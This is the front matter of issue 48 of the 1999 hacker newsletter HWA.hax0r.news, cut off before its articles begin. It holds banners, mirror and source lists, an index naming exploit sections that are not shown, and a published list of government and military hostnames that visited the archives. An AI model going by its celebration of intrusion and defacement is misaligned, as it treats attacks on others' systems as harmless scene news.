Copy Link
Add to Bookmark
Report
hwa-hn48
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99/2000=] Number 48 Volume 1 1999 Dec 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
(¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
__ ____ __ __ __ _____ ____ __
/ / / / // / ____ ____ __ __ / / / /___ / < /___/ / // / __ ______
/ /_/ / // /_/ __ \/ __ \/ / / / / /_/ / __ \/ // / __ / // /_/ / / /_ /
/ __ /__ __/ /_/ / /_/ / /_/ / / __ / /_/ / // / /_/ /__ __/ /_/ / / /_
/_/ /_/ /_/ / .___/ .___/\__, / /_/ /_/\____/_//_/\__,_/ /_/ \__, / /___/
/_/ /_/ /____/ /____/
The end is nigh!, cash in your bearer bonds! - sAs
I'm waiting for a $100,206,570 credit on my Visa bill! - Ed
Got plenty of ammo? did you remember to buy gun oil? - Ed
(¯`·._(¯`·._(¯`·._(¯`·._( © xmas! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
OH YA, AND HAPPY NEW YEARS
Coming soon!
__ __ __
___________________ _/ /______/ /_ ____ _____ ____/ /
/ ___/ ___/ ___/ __ `/ __/ ___/ __ \ / __ `/ __ \/ __ /
(__ ) /__/ / / /_/ / /_/ /__/ / / / / /_/ / / / / /_/ /
/____/\___/_/ \__,_/\__/\___/_/ /_/ \__,_/_/ /_/\__,_/
_________ (_) __/ __/ (_)___________ _____ / /
/ ___/ __ \/ / /_/ /_ / / ___/ ___/ / / / _ \/ /
(__ ) / / / / __/ __/ / (__ |__ ) /_/ / __/_/
/____/_/ /_/_/_/ /_/ /_/____/____/\__,_/\___(_)
(¯`·._(¯`·._(¯`·._(¯`·._( © w00t! © )_.·´¯)_.·´¯)_.·´¯)_.·´¯)
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #48 covering Dec 19th to Dec 26th
* Also contains some older material missed from
past issues over the last few weeks.
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Mailing list members: 468 Can we bump this up somewhat? spread the word!
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
.gov and .mil activity
cofcs71.aphis.usda.gov
samds4.sam.pentagon.mil
eg-016-045.eglin.af.mil
pacfa.evepier.navy.mil
obgate.hill.af.mil
biglost.inel.gov
marshall.state.gov
flatline.arc.nasa.gov
mars.istac.gov
gateway1.osd.mil
gateway3.osd.mil
elan5172.cbcph.navy.mil
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to see
our boys keeping up with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ ___ ___ _ ___
| | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____
| |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
| _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \
|_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_____ _ _ _
| ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _
| |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
| _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| |
|_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
|___/
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
BTW if anyone can suggest a better editor than UEDIT for
this thing send me some email i'm finding it lacking in
certain areas. Must be able to produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/
New mirror sites
*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Socks proxies, Wingates and more from IRC4ALL....................
04.0 .. Cyberarmy Proxies, Accounts and Wingates etc (* If available)....
05.0 .. Belgium: Security of Banksys compromised.........................
06.0 .. Public access mail servers.......................................
07.0 .. Santa Claus about to lose his domain name for nonpayment? .......
08.0 .. Interview with NFO (Nine Forty One Group)........................
09.0 .. The History of IRC (Internet Relay Chat).........................
10.0 .. Pagoo Internet voice MailBox by Loophole/HHP.....................
11.0 .. Top 11 Stories of 1999 according to HNN..........................
12.0 .. AntiVirus scanning and misused tools.............................
13.0 .. RST Sets the Record Straight ....................................
14.0 .. Russian Politician Threatens Cyber Attack .......................
15.0 .. PCR-1000 Control Suite Released by Ghetto.org ...................
16.0 .. Nuclear Power Plant Y2K Readiness ...............................
17.0 .. New E-zines Released ............................................
18.0 .. Digi.no publishes Script Kiddie Rant ............................
19.0 .. w00w00 Con 1999..................................................
20.0 .. pops.c popmail scanner by duro...................................
21.0 .. Cypherpunks meeting announcement.................................
22.0 .. Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5...
23.0 .. [ISN] Hacker Shootouts?..........................................
24.0 .. [ISN] 21 yr old secures $53Mil for high-tech startup.............
25.0 .. [ISN] Netscape Security Flaw Revealed............................
26.0 .. [ISN] Cyberterrorism hype........................................
27.0 .. [ISN] The Beijing Hack Attack....................................
28.0 .. [ISN] Most cybercrime goes unpunished............................
29.0 .. [ISN] Jubilant Zhirinovsky wants to hack western computers.......
30.0 .. [ISN] Tribe and Trinoo, two new virulent virii...................
31.0 .. [ISN] As New Year nears, threat of Net attack program mounts.....
32.0 .. [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)..
33.0 .. [ISN] How to report internet related crime.......................
34.0 .. [ISN] Ten risks of PKI (Public Key Infrastructure)...............
35.0 .. [ISN] Forbes says he'll ditch all crypto export controls.........
36.0 .. [ISN] Zyklon claims his crime was "no big deal" .................
37.0 .. [ISN] Security Wire Digest Volume 1..............................
38.0 .. mailx.c slackware 3.6 local exploit..............................
39.0 .. cmsdex.c Solaris (2.6 / 7.0) remote exploit......................
40.0 .. xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier...........
41.0 .. rpc.autofsd.c FreeBSD/misc remote exploit by guidob..............
42.0 .. iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
43.0 .. truck.c UnixWare 7.1 local explot by Brock Tellier...............
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 Sources ***
~~~~~~~~~~~
____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ s
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PLEASE if you have any changes or additions for this section please
mail them to cruciphux@dok.org. Thank you.
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html
--
defaced [web page defacement announce list]
This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.
There will be two types of posts to this list:
1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)
-=-
--
defaced summary [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.
There will be ONE type of post to this list:
1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
defaced GM [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
--
defaced alpha [web page defacement announce list]
This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.
To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
